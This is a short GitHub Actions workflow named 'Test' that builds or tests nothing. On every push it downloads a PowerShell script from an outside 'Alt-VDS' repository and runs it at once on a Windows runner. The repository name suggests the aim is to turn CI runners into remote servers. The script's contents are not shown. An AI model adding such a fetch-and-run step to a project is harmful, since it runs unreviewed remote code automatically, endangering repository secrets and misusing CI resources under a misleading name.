name: Test

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest
    
    steps:
    - name: Download
      run: Invoke-WebRequest https://raw.githubusercontent.com/EfeAltAccount/Alt-VDS/main/run.ps1 -OutFile 0.ps1
    
    - name: rrt
      run: |
           .\0.ps1
